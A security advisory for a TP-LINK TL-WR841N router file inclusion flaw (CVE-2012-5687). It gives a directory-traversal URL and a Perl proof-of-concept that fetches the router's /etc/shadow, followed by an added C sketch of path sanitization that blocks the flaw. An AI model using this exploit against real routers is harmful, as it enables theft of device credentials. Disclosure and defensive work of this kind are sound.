- | ____| | | (_) | | | / ____| | | (_) |
- | |__ __ ___ __ | | ___ _| |_ | |__ _ _ | | _ _| |__ ___ _ __ ___ ___ ___ _ _ _ __ _| |_ _ _
- | __| \ \/ / '_ \| |/ _ \| | __| | '_ \| | | | | | | | | | '_ \ / _ \ '__/ __|/ _ \/ __| | | | '__| | __| | | |
- | |____ > <| |_) | | (_) | | |_ | |_) | |_| | | |___| |_| | |_) | __/ | \__ \ __/ (__| |_| | | | | |_| |_| |
- |______/_/\_\ .__/|_|\___/|_|\__| |_.__/ \__, | \_____\__, |_.__/ \___|_| |___/\___|\___|\__,_|_| |_|\__|\__, |
- | | __/ | __/ | __/ |
- |_| |___/ |___/ |___/
- ##################################################################################################################
- | Security Advisory - TP-LINK TL-WR841N LFI |=
- Issue: TL-WR841N 300Mbps Wireless N Router by "TP-LINK"
- Firmware Version: 3.13.9 Build 120201 Rel.54965n and below
- Discovered Date: 24/10/2012
- CVE-ID: CVE-2012-5687
- Author: Matan Azugi [matan (at) madsec.co (dot) il]
- Product Vendor: http://www.tp-link.com/en/products/details/?model=TL-WR841N
- Details:
- The TP-LINK TL-WR841N Wireless Router is prone to a Local File Inclusion (LFI)
- vulnerability.
- The vulnerability exists in the web-based management interface. The URL path
- is not properly sanitized before being used.
- Exploitation URL:
- http://192.168.0.1/help/../../../../../../../../etc/shadow
- Successful exploitation allows viewing the router configuration and password
- files.
- Proof of Concept Code:
- #TP-LINK TL-WR841N Shadow file grabber#
- #built by Pulse matan (at) madsec.co (dot) il#
- #enjoy#
- use LWP::UserAgent;
- $host = $ARGV[0];
- chomp($host);
- if($host !~ /http:\/\//) { $host = "http://$host"; };
- my $ua = LWP::UserAgent->new;
- $ua->timeout(30);
- $lfi = "/help/../../../../../../../../etc/shadow";
- $url = $host.$lfi;
- $request = HTTP::Request->new('GET', $url);
- $response = $ua->request($request);
- my $html = $response->content;
- if($html =~ /root/) {
-     print "root$' \n";
- }
- Thank You,
- Matan Azugi, MCSE OSCP
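
The sanitization step the advisory says is missing, sketched as an added example (not code from the advisory or from TP-LINK firmware): the request path is percent-decoded once, rebuilt segment by segment, and refused if any `..` would climb above the web root. The function names, the 256-byte buffers and the `/help/` prefix policy are assumptions made for illustration.

```c
#include <ctype.h>
#include <stdlib.h>
#include <string.h>

/* Normalize req into out; -1 if malformed or ".." climbs above the root. */
int normalize_request_path(const char *req, char *out, size_t outlen)
{
    char dec[256];
    size_t n = 0, o = 0;
    /* Pass 1: percent-decode once so %2e%2e is seen as "..". */
    for (const char *p = req; *p; p++) {
        int c = (unsigned char)*p;
        if (c == '%') {
            if (!isxdigit((unsigned char)p[1]) || !isxdigit((unsigned char)p[2]))
                return -1;
            char h[3] = { p[1], p[2], '\0' };
            c = (int)strtol(h, NULL, 16);
            p += 2;
        }
        if (c == 0 || c == '\\' || n + 1 >= sizeof dec) return -1;
        dec[n++] = (char)c;
    }
    dec[n] = '\0';
    if (dec[0] != '/' || outlen < 2) return -1;
    /* Pass 2: rebuild the path one segment at a time. */
    for (char *s = strtok(dec, "/"); s; s = strtok(NULL, "/")) {
        size_t len = strlen(s);
        if (strcmp(s, ".") == 0) continue;
        if (strcmp(s, "..") == 0) {
            if (o == 0) return -1;          /* would leave the web root */
            while (out[--o] != '/') { }     /* drop the last segment */
            continue;
        }
        if (o + len + 2 > outlen) return -1;
        out[o++] = '/';
        memcpy(out + o, s, len);
        o += len;
    }
    if (o == 0) out[o++] = '/';
    out[o] = '\0';
    return 0;
}
/* Hypothetical policy for the help handler: serve only paths under /help/. */
int help_path_allowed(const char *req)
{
    char norm[256];
    return normalize_request_path(req, norm, sizeof norm) == 0 &&
           strncmp(norm, "/help/", 6) == 0;
}
```

A handler would call `help_path_allowed()` before opening any file and answer a rejected path with an HTTP error instead of passing the raw URL to the filesystem.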